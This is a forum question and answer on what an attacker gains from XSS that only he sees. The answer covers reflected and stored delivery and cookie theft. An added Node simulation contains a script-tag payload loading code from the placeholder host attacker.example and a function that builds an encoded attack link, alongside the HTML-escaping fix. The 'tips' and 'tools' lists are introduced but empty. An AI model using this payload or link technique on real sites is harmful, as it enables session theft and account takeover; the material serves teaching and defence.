What exactly can a malicious user gain if the XSS input he enters will be viewed only by him? Is there anything he can gain?
I understand how XSS is a problem when the malicious user input will be viewed by all site users. But if each user views only his own input, his malicious input will be viewed only by him, so my questions:
- can this affect other users indirectly in some way?
- what can he gain from this?
What an attacker gains from seeing that the XSS attack vector he found works is just that 🙂 But then he can use that attack vector, and there are several ways to do so.
If it’s a non-persistent XSS vulnerability (aka reflected), then probably by sending a link (most probably obfuscated via a URL shortener) to potential victims.
If it’s a persistent XSS vulnerability (i.e. stored as a comment like the one I’m writing now), then he would just make his post and wait.
Now, what he can gain is a big topic. Just think what you could do if you could inject a script tag into a web page. You could then load a whole JavaScript file from your server.
The malicious code would then steal some cookies perhaps (if those are not set HttpOnly) and immediately post them via Ajax to a backend application, which would probably notify the attacker, and who knows, those cookies might be enough to log in to that website as the victim.
Well, there are many things an attacker can do, so please eliminate all XSS vulnerabilities you might have.
XSS vulnerabilities mainly take advantage of the trust people have in other websites.
Don’t underestimate XSRF vulnerabilities, which depend on the trust a website has in your browser (another big topic), and SQL injection attacks.
A few tips (I’m sure you know all about it, but for the sake of completeness):
Good luck!
UPDATE:
A few tools that can help:
(I recommend SkipFish)
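The chain the answer above describes (reflected parameter, crafted link, injected script tag, cookies readable unless HttpOnly) as a small runnable model. This is an added example, not code from the original post: the page renderers, the `attacker.example`/`victim.example` hostnames and the cookie jar are all constructed for illustration, and "does the page execute the payload" is approximated by checking for a script element in the rendered HTML rather than by running a browser.

```javascript
// Added example (not part of the original answer): a minimal model of the
// reflected-XSS-to-cookie-theft chain, runnable under Node. Hostnames, page
// renderers and the cookie jar below are constructed for illustration.

// 1. The vulnerable page: reflects the "q" parameter into HTML without encoding.
function renderSearchPageVulnerable(q) {
  return `<html><body><h1>Results for: ${q}</h1></body></html>`;
}

// 2. The fix: encode the characters that matter in an HTML text context.
function escapeHtml(s) {
  return String(s).replace(/[&<>"']/g, (c) => ({
    '&': '&amp;', '<': '&lt;', '>': '&gt;', '"': '&quot;', "'": '&#x27;',
  }[c]));
}
function renderSearchPageSafe(q) {
  return `<html><body><h1>Results for: ${escapeHtml(q)}</h1></body></html>`;
}

// 3. The attacker's payload: a script tag that pulls a whole file from a server
//    the attacker controls (placeholder hostname).
const PAYLOAD = '<script src="https://attacker.example/x.js"></script>';

// 4. The delivery vehicle for reflected XSS: a link the victim is tricked into
//    clicking. URL-encoding keeps the payload intact through the query string
//    (and makes it far less obvious to a human reading the link).
function buildAttackLink(baseUrl, payload) {
  const u = new URL(baseUrl);
  u.searchParams.set('q', payload);
  return u.toString();
}

// 5. What the injected script can read. document.cookie exposes only cookies
//    set without the HttpOnly flag; this models that rule over a constructed jar.
function cookiesVisibleToScript(jar) {
  return jar
    .filter((c) => !c.httpOnly)
    .map((c) => `${c.name}=${c.value}`)
    .join('; ');
}

// 6. Crude stand-in for "the browser would execute this": is there a real
//    <script ...> element in the rendered markup?
function containsScriptTag(html) {
  return /<script[\s>]/i.test(html);
}

// Run the chain end to end on constructed data and report what each side gets.
function simulate() {
  const link = buildAttackLink('https://victim.example/search', PAYLOAD);
  // The server decodes the parameter exactly as the attacker wrote it.
  const q = new URL(link).searchParams.get('q');
  const jar = [
    { name: 'session', value: 'abc123', httpOnly: true },  // safe from script
    { name: 'theme', value: 'dark', httpOnly: false },
    { name: 'csrf', value: 'tok', httpOnly: false },
  ];
  return {
    link,
    vulnerableExecutes: containsScriptTag(renderSearchPageVulnerable(q)),
    safeExecutes: containsScriptTag(renderSearchPageSafe(q)),
    stolen: cookiesVisibleToScript(jar),
  };
}

console.log(JSON.stringify(simulate(), null, 2));
```

Two things worth noticing when you run it: the session cookie never shows up in `stolen` because it is HttpOnly, which is exactly the caveat in the answer, and the escaped page still displays the attacker's text verbatim to the user, it just no longer contains a script element. Output encoding for the context you are writing into (HTML text here; attributes, URLs and JavaScript strings each need their own encoder) is the fix, not input filtering.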